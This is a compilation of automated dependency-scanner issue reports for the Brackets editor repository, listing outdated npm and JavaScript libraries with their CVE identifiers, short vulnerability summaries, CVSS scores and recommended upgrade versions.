Path to vulnerable library: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/connect/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
senchalabs/connect prior to 2.8.1 is vulnerable to xss attack
Publish Date: 2013-06-27
URL: WS-2013-0003
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nodesecurity.io/advisories/methodOverride_Middleware_Reflected_Cross-Site_Scripting
Release Date: 2013-07-01
Fix Resolution: Update to the newest version of Connect or disable methodOverride. It is not possible to avoid the vulnerability if you have enabled this middleware in the top of your stack.
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - tunnel-agent-0.4.3.tgzHTTP proxy tunneling agent. Formerly part of mikeal/request, now a standalone module.
Library home page: https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.4.3.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/tunnel-agent/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
Versions of tunnel-agent before 0.6.0 are vulnerable to memory exposure. This is exploitable if user supplied input is provided to the auth value and is a number.
Publish Date: 2017-03-05
URL: WS-2018-0076
CVSS 3 Score Details (5.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nodesecurity.io/advisories/598
Release Date: 2017-03-05
Fix Resolution (tunnel-agent): 0.6.0
Direct dependency fix Resolution (request): 2.81.0
Step up your Open Source Security Game with Mend here
Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
Path to dependency file: /test/SpecRunner.html
Path to vulnerable library: /test/../src/thirdparty/jquery-2.1.3.min.js,/src/thirdparty/jquery-2.1.3.min.js
Dependency Hierarchy:
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js
Path to dependency file: /src/LiveDevelopment/Inspector/inspector.html
Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
Publish Date: 2018-01-18
URL: CVE-2015-9251
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nvd.nist.gov/vuln/detail/CVE-2015-9251
Release Date: 2018-01-18
Fix Resolution: jQuery - 3.0.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - sshpk-1.13.1.tgzA library for finding and using SSH public keys
Library home page: https://registry.npmjs.org/sshpk/-/sshpk-1.13.1.tgz
Path to dependency file: /src/package.json
Path to vulnerable library: /src/node_modules/sshpk/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
sshpk is vulnerable to ReDoS when parsing crafted invalid public keys.
Publish Date: 2018-06-07
URL: CVE-2018-3737
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://hackerone.com/reports/319593
Release Date: 2018-04-26
Fix Resolution (sshpk): 1.13.2
Direct dependency fix Resolution (less): 2.7.3
Step up your Open Source Security Game with Mend here
Vulnerable Library - jquery-2.1.3.min.jsJavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
Path to dependency file: /test/SpecRunner.html
Path to vulnerable library: /test/../src/thirdparty/jquery-2.1.3.min.js,/src/thirdparty/jquery-2.1.3.min.js
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable proto property, it could extend the native Object.prototype.
Publish Date: 2019-04-20
URL: CVE-2019-11358
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11358
Release Date: 2019-04-20
Fix Resolution: jquery - 3.4.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - ssri-6.0.1.tgzStandard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.
Library home page: https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/npm/node_modules/ssri/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
ssri 5.2.2-8.0.0, fixed in 8.0.1, processes SRIs using a regular expression which is vulnerable to a denial of service. Malicious SRIs could take an extremely long time to process, leading to denial of service. This issue only affects consumers using the strict option.
Publish Date: 2021-03-12
URL: CVE-2021-27290
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-vx3p-948g-6vhq
Release Date: 2021-03-12
Fix Resolution (ssri): 6.0.2
Direct dependency fix Resolution (npm): 6.14.7
Step up your Open Source Security Game with Mend here
The project could not be analyzed because of build errors. Please review the error messages here. Another build will be scheduled when a change to a manifest file* occurs. If the build is successful this issue will be closed, otherwise the error message will be updated.
This is an automated GitHub Issue created by Sonatype DepShield. GitHub Apps, including DepShield, can be managed from the Developer settings of the repository administrators.
* Supported manifest files are: pom.xml, package.json, package-lock.json, npm-shrinkwrap.json, Cargo.lock, Cargo.toml, main.rs, lib.rs, build.gradle, build.gradle.kts, settings.gradle, settings.gradle.kts, gradle.properties, gradle-wrapper.properties, go.mod, go.sum
Vulnerable Library - sshpk-1.13.1.tgzA library for finding and using SSH public keys
Library home page: https://registry.npmjs.org/sshpk/-/sshpk-1.13.1.tgz
Path to dependency file: brackets/src/package.json
Path to vulnerable library: brackets/src/node_modules/sshpk/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
sshpk is vulnerable to ReDoS when parsing crafted invalid public keys.
Publish Date: 2018-06-07
URL: CVE-2018-3737
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://hackerone.com/reports/319593
Release Date: 2018-06-07
Fix Resolution: 1.13.2
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - extend-3.0.1.tgzPort of jQuery.extend for node.js and the browser
Library home page: https://registry.npmjs.org/extend/-/extend-3.0.1.tgz
Path to dependency file: brackets/src/package.json
Path to vulnerable library: brackets/src/node_modules/extend/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: master
Vulnerability Details
A prototype pollution vulnerability was found in module extend <2.0.2, ~<3.0.2 that allows an attacker to inject arbitrary properties onto Object.prototype.
Publish Date: 2019-02-01
URL: CVE-2018-16492
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://hackerone.com/reports/381185
Release Date: 2019-02-01
Fix Resolution: extend - v3.0.2,v2.0.2
Step up your Open Source Security Game with WhiteSource here
Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
Path to dependency file: /test/SpecRunner.html
Path to vulnerable library: /test/../src/thirdparty/jquery-2.1.3.min.js,/src/thirdparty/jquery-2.1.3.min.js
Dependency Hierarchy:
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js
Path to dependency file: /src/LiveDevelopment/Inspector/inspector.html
Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
Publish Date: 2020-04-29
URL: CVE-2020-11022
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11022
Release Date: 2020-04-29
Fix Resolution: jQuery - 3.5.0
Step up your Open Source Security Game with Mend here
Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
Path to dependency file: brackets/src/index.html
Path to vulnerable library: /src/thirdparty/jquery-2.1.3.min.js,/test/../src/thirdparty/jquery-2.1.3.min.js
Dependency Hierarchy:
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js
Path to dependency file: brackets/src/LiveDevelopment/Inspector/inspector.html
Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
Publish Date: 2020-04-29
URL: CVE-2020-11022
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
Release Date: 2020-04-29
Fix Resolution: jQuery - 3.5.0
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - ini-1.3.5.tgzAn ini encoder/decoder for node
Library home page: https://registry.npmjs.org/ini/-/ini-1.3.5.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/npm/node_modules/ini/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
Publish Date: 2020-12-11
URL: CVE-2020-7788
CVSS 3 Score Details (7.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
Release Date: 2020-12-11
Fix Resolution: v1.3.6
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - tough-cookie-2.2.2.tgzRFC6265 Cookies and Cookie Jar for node.js
Library home page: https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.2.2.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/phantomjs/node_modules/tough-cookie/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: master
Vulnerability Details
NodeJS Tough-Cookie version 2.2.2 contains a Regular Expression Parsing vulnerability in HTTP request Cookie Header parsing that can result in Denial of Service. This attack appear to be exploitable via Custom HTTP header passed by client. This vulnerability appears to have been fixed in 2.3.0.
Publish Date: 2018-09-05
URL: CVE-2016-1000232
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://www.npmjs.com/advisories/130
Release Date: 2018-09-05
Fix Resolution: 2.3.0
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - serialize-javascript-1.9.1.tgzSerialize JavaScript to a superset of JSON that includes regular expressions and functions.
Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-1.9.1.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/serialize-javascript/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: master
Vulnerability Details
serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function "deleteFunctions" within "index.js".
Publish Date: 2020-06-01
URL: CVE-2020-7660
CVSS 3 Score Details (8.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7660
Release Date: 2020-06-01
Fix Resolution: serialize-javascript - 3.1.0
Step up your Open Source Security Game with WhiteSource here
Vulnerable Libraries - cryptiles-0.2.2.tgz, cryptiles-2.0.5.tgz
General purpose crypto utilities
Library home page: https://registry.npmjs.org/cryptiles/-/cryptiles-0.2.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/phantomjs/node_modules/cryptiles/package.json
Dependency Hierarchy:
General purpose crypto utilities
Library home page: https://registry.npmjs.org/cryptiles/-/cryptiles-2.0.5.tgz
Path to dependency file: /src/package.json
Path to vulnerable library: /src/node_modules/cryptiles/package.json,/node_modules/cryptiles/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
Eran Hammer cryptiles version 4.1.1 earlier contains a CWE-331: Insufficient Entropy vulnerability in randomDigits() method that can result in An attacker is more likely to be able to brute force something that was supposed to be random.. This attack appear to be exploitable via Depends upon the calling application.. This vulnerability appears to have been fixed in 4.1.2.
Publish Date: 2018-07-09
URL: CVE-2018-1000620
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1000620
Release Date: 2018-07-09
Fix Resolution (cryptiles): 4.1.2
Direct dependency fix Resolution (request): 2.82.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - stringstream-0.0.5.tgzEncode and decode streams into string streams
Library home page: https://registry.npmjs.org/stringstream/-/stringstream-0.0.5.tgz
Path to dependency file: /src/package.json
Path to vulnerable library: /src/node_modules/stringstream/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
Versions less than 0.0.6 of the Node.js stringstream module are vulnerable to an out-of-bounds read because of allocation of uninitialized buffers when a number is passed in the input stream (when using Node.js 4.x).
Publish Date: 2020-12-03
URL: CVE-2018-21270
CVSS 3 Score Details (6.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-21270
Release Date: 2020-12-03
Fix Resolution (stringstream): 0.0.6
Direct dependency fix Resolution (less): 2.7.3
Step up your Open Source Security Game with Mend here
Vulnerable Library - bootstrap-2.0.3.min.jsThe most popular front-end framework for developing responsive, mobile first projects on the web.
Library home page: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/2.0.3/bootstrap.min.js
Path to dependency file: /test/SpecRunner.html
Path to vulnerable library: /test/thirdparty/bootstrap2/js/bootstrap.min.js
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible in the tooltip or popover data-template attribute.
Publish Date: 2019-02-20
URL: CVE-2019-8331
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2019-02-20
Fix Resolution: bootstrap - 3.4.1,4.3.1;bootstrap-sass - 3.4.1,4.3.1
Step up your Open Source Security Game with Mend here
Vulnerable Library - bootstrap-2.0.3.min.jsThe most popular front-end framework for developing responsive, mobile first projects on the web.
Library home page: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/2.0.3/bootstrap.min.js
Path to dependency file: /test/SpecRunner.html
Path to vulnerable library: /test/thirdparty/bootstrap2/js/bootstrap.min.js
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute.
Publish Date: 2019-01-09
URL: CVE-2018-20676
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20676
Release Date: 2019-01-09
Fix Resolution: bootstrap - 3.4.0
Step up your Open Source Security Game with Mend here
Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
Path to dependency file: /test/SpecRunner.html
Path to vulnerable library: /test/../src/thirdparty/jquery-2.1.3.min.js,/src/thirdparty/jquery-2.1.3.min.js
Dependency Hierarchy:
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js
Path to dependency file: /src/LiveDevelopment/Inspector/inspector.html
Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
Publish Date: 2020-04-29
URL: CVE-2020-11023
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2020-04-29
Fix Resolution: jquery - 3.5.0;jquery-rails - 4.4.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - uglify-js-1.0.7.tgzLibrary home page: https://registry.npmjs.org/uglify-js/-/uglify-js-1.0.7.tgz
Path to dependency file: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/package.json
Path to vulnerable library: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/uglify-js/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
uglifier incorrectly handles non-boolean comparisons during minification.The upstream library for the Ruby uglifier gem, UglifyJS, is affected by a vulnerability that allows a specially crafted Javascript file to have altered functionality after minification. This bug, found in UglifyJS versions 2.4.23 and earlier, was demonstrated to allow potentially malicious code to be hidden within secure code, and activated by the minification process.
Publish Date: 2015-07-22
URL: WS-2015-0033
CVSS 3 Score Details (7.2)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://hakiri.io/technologies/uglifier/issues/279911d9720338
Release Date: 2020-06-07
Fix Resolution: Uglifier - 2.7.2;uglify-js - v2.4.24
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - jquery-1.7.1.min.jsJavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js
Path to dependency file: /src/LiveDevelopment/Inspector/inspector.html
Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
jquery prior to 1.9.0 allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove "<script>" HTML tags that contain a whitespace character, i.e: "</script >", which results in the enclosed script logic to be executed.
Publish Date: 2020-05-19
URL: CVE-2020-7656
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-q4m3-2j7h-f7xw
Release Date: 2020-05-19
Fix Resolution: jquery - 1.9.0
Step up your Open Source Security Game with Mend here
Vulnerable Libraries - mime-1.2.11.tgz, mime-1.4.0.tgz
A comprehensive library for mime-type mapping
Library home page: https://registry.npmjs.org/mime/-/mime-1.2.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/mime/package.json
Dependency Hierarchy:
A comprehensive library for mime-type mapping
Library home page: https://registry.npmjs.org/mime/-/mime-1.4.0.tgz
Path to dependency file: /src/package.json
Path to vulnerable library: /src/node_modules/mime/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
The mime module < 1.4.1, 2.0.1, 2.0.2 is vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.
Publish Date: 2018-06-07
URL: CVE-2017-16138
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16138
Release Date: 2018-04-26
Fix Resolution (mime): 1.4.1
Direct dependency fix Resolution (grunt-contrib-less): 1.4.1
Fix Resolution (mime): 1.4.1
Direct dependency fix Resolution (less): 2.7.3
Step up your Open Source Security Game with Mend here
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.
